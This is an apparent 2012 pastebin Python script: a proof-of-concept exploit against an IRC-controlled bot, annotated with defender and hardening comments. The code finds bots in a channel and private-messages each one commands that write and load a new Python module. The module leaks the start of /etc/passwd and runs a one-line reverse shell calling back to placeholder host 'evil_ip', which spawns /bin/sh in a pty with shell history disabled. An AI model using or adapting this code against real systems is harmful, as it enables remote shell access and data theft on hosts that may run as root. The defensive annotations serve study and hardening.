
Untitled

a guest
Aug 6th, 2012
  1. from socket import *
  2. from time import sleep
  3. import re
  4. from random import sample
  5.  
  # Settings for a proof-of-concept against an IRC-controlled bot.
  # Everything here is attacker-chosen text that is later concatenated into
  # PRIVMSG commands; this script does not validate or escape any of it.
  #
  # IRC identity and target server. 172.16.72.128 is in the private
  # 172.16.0.0/12 range; 6667 is the usual plaintext IRC port.
  6. username = 'exploit'
  7. server = '172.16.72.128'
  8. port = 6667
  9. server_ver = AF_INET#6
  10. channel = 'eip'
  11.  
  # module_name and func_name are each 7 distinct lowercase letters picked with
  # random.sample, so they change on every run. Defender note: a fixed file or
  # function name cannot be used as an indicator; watch for new .py files
  # appearing under the bot's services directory instead.
  12. module_name = ''.join(sample('qwertyuiopasdfghjklzxcvbnm', 7))
  # Absolute path the bot is asked to write to. NOTE(review): a path under
  # /root suggests the targeted bot runs as root -- not confirmed by this page.
  13. service_path = '/root/.services_trololololoooo/torqux/' + module_name + '.py'
  14. func_name = ''.join(sample('qwertyuiopasdfghjklzxcvbnm', 7))
  # 'evil_ip' is a placeholder left by the author, not a real address.
  # The port and address family are kept as strings because they are spliced
  # into the Python source text held in `payload`.
  15. backconnect_host = 'evil_ip'
  16. backconnect_port = '1165'
  17. backconnect_ver = 'AF_INET6'
  # One line of Python source meant to run inside the bot process. As written it
  # opens a TCP socket to host/port, duplicates that socket onto fds 0, 1 and 2,
  # unsets HISTFILE and HISTFILESIZE, forks, and runs /bin/sh in a pty.
  # Defender note: on the bot host this shows up as the bot's interpreter
  # holding an outbound TCP connection with a /bin/sh child on a pty and the
  # history variables removed from its environment; restricting outbound
  # connections from the bot host prevents the call-back from completing.
  18. payload = 'import sys ; import os;import socket;import pty;shell = "/bin/sh";host = "' + backconnect_host + '";port = ' + backconnect_port + ';s = socket.socket(socket.' + backconnect_ver + ',socket.SOCK_STREAM);s.connect((host, port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.unsetenv("HISTFILE");os.unsetenv("HISTFILESIZE");pid = os.fork();pid or pty.spawn(shell); s.close()'
  19.  
  # Script body: register on the IRC server, join the channel, list the bots
  # that answer `!d`, then send each bot a fixed command sequence that writes a
  # Python function to service_path and invokes it.
  #
  # NOTE(review): the bot's source is not on this page. The sequence only has an
  # effect if the bot accepts these commands from an arbitrary IRC user and lets
  # `!messages` write caller-supplied text to a caller-supplied path --
  # presumably the flaw being demonstrated. The matching hardening is to accept
  # control commands only from authenticated operators, never take a file path
  # from a chat message, not load modules written at runtime, and run the bot as
  # an unprivileged user.
  20. if __name__ == '__main__':
  21.     s = socket(server_ver, SOCK_STREAM)
  22.     s.connect((server, port))
          # Standard IRC registration: NICK, then USER with the name repeated.
  23.     s.send('NICK ' + username +'\r\n')
  24.     s.send('USER '+ (username + ' ')*3 + ':Python IRC\r\n')
          # Fixed 10 s pause before JOIN -- presumably to let registration finish.
  25.     sleep(10)
  26.     s.send('JOIN #' + channel + '\r\n')
          # Accumulate server output until the 'End of MOTD command' text is seen.
          # There is no timeout: the loop blocks for as long as that text is absent.
  27.     res = ''
  28.     while 'End of MOTD command' not in res:
  29.         res += s.recv(100500)
          # `!d` is sent to the whole channel; after 4 s a single recv is parsed.
  30.     s.send('PRIVMSG #' + channel + ' :!d\r\n')
  31.     sleep(4)
  32.     res1 = s.recv(100500)
  33.     #print res1
          # Every line whose text contains ' rolls' is treated as a bot reply; the
          # nick is taken from the IRC prefix (the part between ':' and '!').
  34.     bots = []
  35.     for l in res1.splitlines():
  36.         nicks = re.findall(r'^:([^!]+)!.*? rolls', l)
  37.         if nicks:
  38.             bots.append(nicks[0])
  39.     print 'Found bots:', bots
  40.  
          # The commands below are addressed to each bot's nick, not to the channel.
          # Defender note: channel logs will not contain them; they are visible only
          # in server-side or bot-side logging of private messages. The meaning of
          # `!_makeit`, `!messages`, `!_addit` and `!reload` is defined by the bot and
          # is inferred here from their names and arguments only.
  41.     for bot in bots:
  42.         #bot = '#eip'
  43.         s.send('PRIVMSG ' + bot + ' :!_makeit 0\r\n')
  44.         sleep(1)
              # Passes service_path followed by Python source: a function that sends
              # the first 100 characters of /etc/passwd through a.sendLns(c, ...) and
              # then runs `payload`. sendLns is presumably the bot's own reply helper.
              # A private message carrying `!messages`, an absolute path and `def ` is
              # the most distinctive observable in this sequence.
  45.         s.send('PRIVMSG ' + bot + ' :!messages ' + service_path + ' ' + 'def ' + func_name + '(a,b,c,d): a.sendLns(c, open("/etc/passwd").read()[0:100]); ' + payload + '\r\n')
  46.         sleep(1)
  47.         s.send('PRIVMSG ' + bot + ' :!_makeit 0\r\n')
  48.         sleep(1)
              # Names the new module to the bot, asks it to reload, then calls the
              # new function name as if it were a regular bot command.
  49.         s.send('PRIVMSG ' + bot + ' :!_addit ' + module_name + '\r\n')
  50.         sleep(1)
  51.         s.send('PRIVMSG ' + bot + ' :!reload\r\n')
  52.         sleep(1)
  53.         s.send('PRIVMSG ' + bot + ' :!' + func_name + '\r\n')
  54.         sleep(1)
  55.  
          # If any bot was addressed, print whatever the server has sent since.
  56.     if bots:
  57.         sleep(1)
  58.         print s.recv(100500)
  59.     s.close()